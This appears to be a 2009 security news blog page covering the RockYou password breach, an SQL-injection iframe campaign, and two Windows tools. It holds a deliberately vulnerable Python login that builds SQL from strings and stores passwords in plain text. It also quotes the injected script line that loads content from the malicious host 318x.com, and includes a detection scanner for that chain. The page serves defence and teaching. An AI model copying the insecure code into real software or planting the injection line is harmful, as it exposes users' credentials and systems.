Dec 16 2009

RockYou Hacked – 32 Million Account Passwords Potentially Exposed

RockYou Hacked
RockYou has suffered a serious hacker attack that has exposed 32 million of its customer usernames and passwords to possible identity theft. And it has apparently taken RockYou more than 10 days to inform its users of the breach.

The security firm Imperva informed RockYou that its site had a serious SQL injection flaw, according to reports. Imperva said that some users’ passwords had already been compromised as a result of the vulnerability by the time it notified RockYou of its findings. RockYou acted quickly to fix the flaw, but perhaps not fast enough. One hacker claimed to have gotten access to the accounts and posted some data as proof. Apparently, the database included the full list of unencrypted passwords in plain text.

The flaw is a big one because RockYou usernames and passwords are, by default, the same as users’ email names and passwords. Security experts are advising RockYou users to change their emails and passwords. RockYou has some of the most popular apps on Facebook, and it ranks third among Facebook developers with 55 million monthly active users, according to AppData.

SQL injection exploits a vulnerability in an app’s database layer and is a very common attack. It potentially lets hackers steal private information, and Yahoo’s jobs site recently suffered a similar attack. Imperva chief technology officer Amichai Shulman told eWeek Europe that users are particularly vulnerable if they use the same usernames and passwords for all of the sites that they visit.

In a statement to Techcrunch, RockYou said, “On December 4, RockYou’s IT team was alerted that the user database on RockYou.com had been compromised, potentially revealing some personal identification data for approximately 30M registered users on RockYou.com. RockYou immediately brought down the site and kept it down until a security patch was in place. RockYou confirms that no application accounts on Facebook were impacted by this hack and that most of the accounts affected were for earlier applications (including slideshow, glitter text, fun notes) that are no longer formally supported by the company. RockYou has secured the site and is in the process of informing all registered users that the hack took place.”

RockYou said it is planning to notify users. As others have noted, 10 days after it learned of the breach is far too late.
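The two defects the report describes, a string-built login query and a table of plain-text passwords, beside the hardened form a site should use instead. This is an added illustration, not RockYou's code, and the in-memory sqlite table and account names are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import sqlite3

def make_db():
    # Constructed in-memory schema for the demonstration, not RockYou's own.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw TEXT, salt BLOB, pw_hash BLOB)")
    return db

# --- The two flaws reported above, reproduced on purpose ---------------------
def register_unsafe(db, name, password):
    # Plain-text storage: a dump of this table is a dump of every password.
    db.execute(f"INSERT INTO users (name, pw) VALUES ('{name}', '{password}')")

def login_unsafe(db, name, password):
    # String-built SQL: user input can change the query's structure.
    query = f"SELECT 1 FROM users WHERE name = '{name}' AND pw = '{password}'"
    return db.execute(query).fetchone() is not None

# --- Hardened form ------------------------------------------------------------
def hash_pw(password, salt):
    # Salted, slow hash: a leaked table no longer yields reusable passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def register_safe(db, name, password):
    salt = os.urandom(16)
    db.execute("INSERT INTO users (name, salt, pw_hash) VALUES (?, ?, ?)",
               (name, salt, hash_pw(password, salt)))

def login_safe(db, name, password):
    # Bound parameters keep the name as data; the password never touches SQL.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE name = ?", (name,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(stored, hash_pw(password, salt))
```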

Source: DigitalBeat

Dec 14 2009

inSSIDer – Wi-Fi Network Scanner For Windows

inSSIDer is an award-winning free Wi-Fi network scanner for Windows Vista and Windows XP. Because NetStumbler doesn’t work well with Vista and 64-bit XP, inSSIDer was written as an open-source Wi-Fi network scanner designed for the current generation of Windows operating systems.

inSSIDer

What’s Unique about inSSIDer?

  • Works on Windows Vista and Windows XP 64-bit.
  • Uses the Native Wi-Fi API.
  • Group by MAC address, SSID, Channel, RSSI and “Time Last Seen”.
  • Compatible with most GPS devices (NMEA v2.3 and higher).

How can inSSIDer help me?

  • Inspect your WLAN and surrounding networks to troubleshoot competing access points.
  • Track the strength of received signal in dBm over time.
  • Filter access points in an easy to use format.
  • Highlight access points for areas with high Wi-Fi concentration.
  • Export Wi-Fi and GPS data to a KML file to view in Google Earth.

Download: Inssider_Installer.msi

More Info: inSSIDer Wi-Fi Scanner | Metageek

Dec 12 2009

SQL Injection Attack Claims 132,000+

A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009.

SQL Injection

Infection sequence:
Injected iframe – <script src=hxxp://318x.com>
Executes a script that creates a new iframe to 318x.com/a.htm. That iframe (a.htm) does 2 things:

1. Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html
2. Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).

The aa1100.2288.org/htmlasp/dasp/alt.html frame:

  • Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html
  • Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but with a different number)
  • Inside a <noscript> block it carries a link (href) to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif

The share.html detects browser type and writes/loads multiple iframes pointing to obfuscated script files located in the same directory (all are javascript regardless of extension). The combined action results in checks for MDAC, OWC10, and various versions of Adobe Flash. Depending on the results, the malcode then delivers one of several possible exploits.
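A defender checking a site's pages for the first two hops of this chain can collect every script and iframe src and flag those pointing at the hosts named above. This scanner is an added example, not part of the ScanSafe report; the sample page it parses is constructed, and it recognises both the defanged hxxp:// form and plain http://.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts named in the write-up for the first two hops of the injection chain.
SUSPECT_HOSTS = ("318x.com", "aa1100.2288.org")

class _SrcCollector(HTMLParser):
    """Records the src of every <script> and <iframe> tag, in document order."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src:
                self.refs.append((tag, src))

def host_of(src):
    """Hostname of a src value; tolerates defanged hxxp:// and scheme-less forms."""
    url = src.strip()
    if url.startswith("hxxp"):
        url = "http" + url[4:]
    if url.startswith("//"):
        url = "http:" + url
    elif "://" not in url:
        return ""          # relative path: same-origin, no remote host
    return (urlsplit(url).hostname or "").lower()

def is_suspect(host):
    return any(host == h or host.endswith("." + h) for h in SUSPECT_HOSTS)

def find_injected_refs(html):
    """Return (tag, src) pairs whose host belongs to the injection chain."""
    parser = _SrcCollector()
    parser.feed(html)
    return [(tag, src) for tag, src in parser.refs if is_suspect(host_of(src))]

# Constructed sample page: one legitimate script plus the injected chain.
SAMPLE_PAGE = """<html><body><h1>Catalogue</h1>
<script src="/static/app.js"></script>
<script src=hxxp://318x.com></script>
<iframe src="http://318x.com/a.htm" width=0 height=0></iframe>
<iframe src="http://aa1100.2288.org/htmlasp/dasp/alt.html"></iframe>
</body></html>"""
```

Running `find_injected_refs` over a crawl of your own pages turns the published indicators into a repeatable check rather than a one-off Google search.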

Observed Exploits Include:

  • Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
  • MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
  • Microsoft Office Web Components vulnerabilities described in MS09-043
  • Microsoft video ActiveX vulnerability described in MS09-032
  • Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002

Malware Description:
Threat name: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

Source: Net-Security

Dec 12 2009

Process Hacker

Process Hacker is a free and open source process viewer and memory editor with unique features such as powerful process termination and a Regex memory searcher. It can show services, processes and their threads, modules, handles and memory regions.

Process Hacker

Key Features:

  • Viewing, terminating, suspending and resuming processes.
  • Restarting processes, creating dump files, detaching from any debuggers, viewing heaps, injecting DLLs, etc.
  • Viewing detailed process information, statistics, and performance information.
  • Viewing, terminating, suspending and resuming threads.
  • Viewing detailed token information (including modifying privileges).
  • Viewing and unloading modules.
  • Viewing memory regions.
  • Viewing environment variables.
  • Viewing and closing handles.
  • Viewing, controlling and editing services.
  • Viewing and closing network connections.

System Requirements:

  • .NET Framework 2.0
  • Microsoft Windows XP SP2 or above, 32-bit or 64-bit.

Latest Release: Process Hacker 1.8

Download: processhacker-1.8-setup.exe

More Info: Home – Process Hacker